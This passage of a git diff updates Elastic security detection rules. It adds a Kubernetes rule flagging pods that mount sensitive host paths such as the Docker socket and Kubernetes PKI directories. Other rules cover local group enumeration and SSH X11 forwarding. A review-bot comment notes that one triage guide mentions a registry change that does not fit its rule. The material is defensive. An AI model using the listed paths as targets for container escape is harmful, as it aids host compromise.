*\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\esentutl.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\RecoveryDrive.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SystemPropertiesComputerName.exe or\n *\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\ImmersiveControlPanel\\\\\\\\SystemSettings.exe or\n *\\:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\rubrik_vmware???\\\\\\\\snaptool.exe or\n *\\:\\\\\\\\Windows\\\\\\\\VeeamVssSupport\\\\\\\\VeeamGuestHelper.exe or\n ?\\:\\\\\\\\WindowsAzure\\\\\\\\*WaAppAgent.exe or\n ?\\:\\\\\\\\Program?Files?\\(x86\\)\\\\\\\\*.exe or\n ?\\:\\\\\\\\Program?Files\\\\\\\\*.exe or\n ?\\:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\*.exe\n )\n )\n", 
 "related_integrations": [
 {
@@ -70,7 +70,7 @@
 ],
 "risk_score": 47,
 "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4",
- "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
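Review bot: The rewritten `note` for rule `291a0de9-937a-4189-94c0-3e847c8b13e4` (hunk `@@ -19,7 +19,7 @@`) keeps the investigation step `Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.`, but this rule triggers on a `user-member-enumerated` IAM event, not on a registry change, so the sentence reads as a copy-paste leftover from another guide; suggest `... login events (for example, 4624) to the target host around the time of the enumeration event.` The tail of the same `note` also repeats the full audit-policy setup text that already lives in the `setup` field rewritten at `@@ -70,7 +70,7 @@`, so any correction to that text has to be made in both copies by hand. The `note` value starts in this hunk but the enclosing JSON object begins and ends outside it.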
diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_209.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_209.json
index 8161b04e217..dbdb9379856 100644
--- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_209.json
+++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_209.json
@@ -19,7 +19,7 @@ "winlog.event_data.SubjectUserName", "winlog.event_data.CallerProcessName" ], - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type:windows and event.category:iam and event.action:user-member-enumerated and \n (\n group.name:(*Admin* or \"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\" or \"S-1-5-32-555\")\n ) and \n not (winlog.event_data.SubjectUserName: (*$ or \"LOCAL SERVICE\" or \"NETWORK SERVICE\") or \n winlog.event_data.CallerProcessName:(\"-\" or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\VSSVC.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SearchIndexer.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CompatTelRunner.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\oobe\\\\\\\\msoobe.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\net1.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Netplwiz.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CloudExperienceHostBroker.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiPrvSE.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SrTasks.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diskshadow.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dfsrs.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\vssadmin.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dllhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SettingSyncHost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\inetsrv\\\\\\\\w3wp.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wsmprovhost.exe or\n 
*\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\spool\\\\\\\\drivers\\\\\\\\x64\\\\\\\\3\\\\\\\\x3jobt3?.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mstsc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\esentutl.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\RecoveryDrive.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SystemPropertiesComputerName.exe or\n *\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\ImmersiveControlPanel\\\\\\\\SystemSettings.exe or\n *\\:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\rubrik_vmware???\\\\\\\\snaptool.exe or\n *\\:\\\\\\\\Windows\\\\\\\\VeeamVssSupport\\\\\\\\VeeamGuestHelper.exe or\n ?\\:\\\\\\\\WindowsAzure\\\\\\\\*WaAppAgent.exe or\n ?\\:\\\\\\\\Program?Files?\\(x86\\)\\\\\\\\*.exe or\n ?\\:\\\\\\\\Program?Files\\\\\\\\*.exe or\n ?\\:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\*.exe\n )\n )\n", "related_integrations": [ { 
@@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", - "setup": "\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was 
not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/29b53942-7cd4-11ee-b70e-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/29b53942-7cd4-11ee-b70e-f661ea17fbcd_1.json index 2f5a6eb3d51..a2cd94cf6a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/29b53942-7cd4-11ee-b70e-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/29b53942-7cd4-11ee-b70e-f661ea17fbcd_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/29ef5686-9b93-433e-91b5-683911094698_1.json b/packages/security_detection_engine/kibana/security_rule/29ef5686-9b93-433e-91b5-683911094698_1.json index c262e30cb18..c71d9a20d92 100644 --- a/packages/security_detection_engine/kibana/security_rule/29ef5686-9b93-433e-91b5-683911094698_1.json +++ b/packages/security_detection_engine/kibana/security_rule/29ef5686-9b93-433e-91b5-683911094698_1.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_1.json b/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_1.json
index f24dc5d0cc9..397f70bf340 100644
--- a/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_1.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Linux SSH X11 Forwarding",
- "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\nprocess.name in (\"ssh\", \"sshd\") and process.args in (\"-X\", \"-Y\") and process.args_count \u003e= 3 and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n",
+ "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\nprocess.name in (\"ssh\", \"sshd\") and process.args in (\"-X\", \"-Y\") and process.args_count >= 3 and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n",
 "references": [
 "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding"
 ],
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_1.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_1.json
index 6d06f5e95cd..66776536ef3 100644
--- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_1.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_2.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_2.json
index 4c0943fc4a1..ca6b19fafb6 100644
--- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_2.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_3.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_3.json
index 3d74796b567..ab8e3a14a30 100644
--- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_3.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_4.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_4.json
index 1c637d97366..2ee2f96974a 100644
--- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_4.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_5.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_5.json
index a8a88d67e14..4f2195a2371 100644
--- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_5.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_201.json b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_201.json
index ea9f982c6d6..b73ec775f7a 100644
--- a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_201.json
+++ b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_201.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_202.json b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_202.json
index a1ee2d9a123..ca3537ac5d0 100644
--- a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_202.json
+++ b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_202.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_203.json b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_203.json
new file mode 100644
index 00000000000..5914f0e5a08
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_203.json
@@ -0,0 +1,107 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects when a pod is created with a sensitive volume of type hostPath. A hostPath volume type mounts a sensitive file or folder from the node to the container. If the container gets compromised, the attacker can use this mount for gaining access to the node. There are many ways a container with unrestricted access to the host filesystem can escalate privileges, including reading data from other containers, and accessing tokens of more privileged pods.",
+ "false_positives": [
+ "An administrator may need to attach a hostPath volume for a legitimate reason. This alert should be investigated for legitimacy by determining if the kuberenetes.audit.requestObject.spec.volumes.hostPath.path triggered is one needed by its target container/pod. For example, when the fleet managed elastic agent is deployed as a daemonset it creates several hostPath volume mounts, some of which are sensitive host directories like /proc, /etc/kubernetes, and /var/log. Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\""
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Pod created with a Sensitive hostPath Volume",
+ "note": "",
+ "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.volumes.hostPath.path:\n (\"/\" or\n \"/proc\" or\n \"/root\" or\n \"/var\" or\n \"/var/run\" or\n \"/var/run/docker.sock\" or\n \"/var/run/crio/crio.sock\" or\n \"/var/run/cri-dockerd.sock\" or\n \"/var/lib/kubelet\" or\n \"/var/lib/kubelet/pki\" or\n \"/var/lib/docker/overlay2\" or\n \"/etc\" or\n \"/etc/kubernetes\" or\n \"/etc/kubernetes/manifests\" or\n \"/etc/kubernetes/pki\" or\n \"/home/admin\")\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n",
+ "references": [
+ "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216",
+ "https://kubernetes.io/docs/concepts/storage/volumes/#hostpath"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.containers.image",
+ "type": "text"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.volumes.hostPath.path",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "2abda169-416b-4bb3-9a6b-f8d239fd78ba",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Data Source: Kubernetes",
+ "Tactic: Execution",
+ "Tactic: Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1610",
+ "name": "Deploy Container",
+ "reference": "https://attack.mitre.org/techniques/T1610/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 203
+ },
+ "id": "2abda169-416b-4bb3-9a6b-f8d239fd78ba_203",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_1.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_1.json
index 260d1c5c664..4aec1a91f96 100644
--- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_1.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
